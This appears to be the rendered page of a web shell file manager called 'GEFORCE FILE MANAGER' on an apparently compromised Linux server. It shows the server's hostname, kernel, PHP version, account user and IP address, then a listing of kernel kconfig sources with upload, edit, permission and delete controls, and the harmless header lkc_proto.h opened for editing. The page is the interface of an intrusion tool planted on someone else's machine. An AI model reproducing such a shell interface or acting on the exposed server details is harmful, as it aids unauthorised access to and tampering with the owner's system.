[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.64.1.el8_10.x86_64
/
scripts
/
kconfig
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 lxdialog
SET
[ DEL ]
📁 tests
SET
[ DEL ]
📄 Makefile
8,022 B
SET
[ EDIT ]
|
[ DEL ]
📄 conf
116,264 B
SET
[ EDIT ]
|
[ DEL ]
📄 conf.c
15,730 B
SET
[ EDIT ]
|
[ DEL ]
📄 confdata.c
25,762 B
SET
[ EDIT ]
|
[ DEL ]
📄 expr.c
30,824 B
SET
[ EDIT ]
|
[ DEL ]
📄 expr.h
9,898 B
SET
[ EDIT ]
|
[ DEL ]
📄 gconf-cfg.sh
579 B
SET
[ EDIT ]
|
[ DEL ]
📄 gconf.c
38,921 B
SET
[ EDIT ]
|
[ DEL ]
📄 gconf.glade
25,642 B
SET
[ EDIT ]
|
[ DEL ]
📄 images.c
6,565 B
SET
[ EDIT ]
|
[ DEL ]
📄 kconf_id.c
1,854 B
SET
[ EDIT ]
|
[ DEL ]
📄 list.h
3,749 B
SET
[ EDIT ]
|
[ DEL ]
📄 lkc.h
4,157 B
SET
[ EDIT ]
|
[ DEL ]
📄 lkc_proto.h
2,520 B
SET
[ EDIT ]
|
[ DEL ]
📄 mconf-cfg.sh
1,009 B
SET
[ EDIT ]
|
[ DEL ]
📄 mconf.c
28,104 B
SET
[ EDIT ]
|
[ DEL ]
📄 menu.c
21,978 B
SET
[ EDIT ]
|
[ DEL ]
📄 merge_config.sh
4,298 B
SET
[ EDIT ]
|
[ DEL ]
📄 nconf-cfg.sh
1,080 B
SET
[ EDIT ]
|
[ DEL ]
📄 nconf.c
39,151 B
SET
[ EDIT ]
|
[ DEL ]
📄 nconf.gui.c
15,108 B
SET
[ EDIT ]
|
[ DEL ]
📄 nconf.h
1,875 B
SET
[ EDIT ]
|
[ DEL ]
📄 preprocess.c
11,241 B
SET
[ EDIT ]
|
[ DEL ]
📄 qconf-cfg.sh
692 B
SET
[ EDIT ]
|
[ DEL ]
📄 qconf.cc
44,862 B
SET
[ EDIT ]
|
[ DEL ]
📄 qconf.h
7,544 B
SET
[ EDIT ]
|
[ DEL ]
📄 streamline_config.pl
16,564 B
SET
[ EDIT ]
|
[ DEL ]
📄 symbol.c
29,999 B
SET
[ EDIT ]
|
[ DEL ]
📄 util.c
2,897 B
SET
[ EDIT ]
|
[ DEL ]
📄 zconf.l
8,457 B
SET
[ EDIT ]
|
[ DEL ]
📄 zconf.lex.c
66,655 B
SET
[ EDIT ]
|
[ DEL ]
📄 zconf.tab.c
73,196 B
SET
[ EDIT ]
|
[ DEL ]
📄 zconf.y
16,925 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: lkc_proto.h
/* SPDX-License-Identifier: GPL-2.0 */ #include <stdarg.h> /* confdata.c */ void conf_parse(const char *name); int conf_read(const char *name); int conf_read_simple(const char *name, int); int conf_write_defconfig(const char *name); int conf_write(const char *name); int conf_write_autoconf(void); bool conf_get_changed(void); void conf_set_changed_callback(void (*fn)(void)); void conf_set_message_callback(void (*fn)(const char *fmt, va_list ap)); /* menu.c */ extern struct menu rootmenu; bool menu_is_empty(struct menu *menu); bool menu_is_visible(struct menu *menu); bool menu_has_prompt(struct menu *menu); const char * menu_get_prompt(struct menu *menu); struct menu * menu_get_root_menu(struct menu *menu); struct menu * menu_get_parent_menu(struct menu *menu); bool menu_has_help(struct menu *menu); const char * menu_get_help(struct menu *menu); struct gstr get_relations_str(struct symbol **sym_arr, struct list_head *head); void menu_get_ext_help(struct menu *menu, struct gstr *help); /* symbol.c */ extern struct symbol * symbol_hash[SYMBOL_HASHSIZE]; struct symbol * sym_lookup(const char *name, int flags); struct symbol * sym_find(const char *name); const char * sym_escape_string_value(const char *in); struct symbol ** sym_re_search(const char *pattern); const char * sym_type_name(enum symbol_type type); void sym_calc_value(struct symbol *sym); enum symbol_type sym_get_type(struct symbol *sym); bool sym_tristate_within_range(struct symbol *sym,tristate tri); bool sym_set_tristate_value(struct symbol *sym,tristate tri); tristate sym_toggle_tristate_value(struct symbol *sym); bool sym_string_valid(struct symbol *sym, const char *newval); bool sym_string_within_range(struct symbol *sym, const char *str); bool sym_set_string_value(struct symbol *sym, const char *newval); bool sym_is_changable(struct symbol *sym); struct property * sym_get_choice_prop(struct symbol *sym); const char * sym_get_string_value(struct symbol *sym); const char * prop_get_type_name(enum prop_type type); /* preprocess.c */ enum variable_flavor { VAR_SIMPLE, VAR_RECURSIVE, VAR_APPEND, }; void env_write_dep(FILE *f, const char *auto_conf_name); void variable_add(const char *name, const char *value, enum variable_flavor flavor); void variable_all_del(void); char *expand_string(const char *in); char *expand_dollar(const char **str); char *expand_one_token(const char **str); /* expr.c */ void expr_print(struct expr *e, void (*fn)(void *, struct symbol *, const char *), void *data, int prevtoken);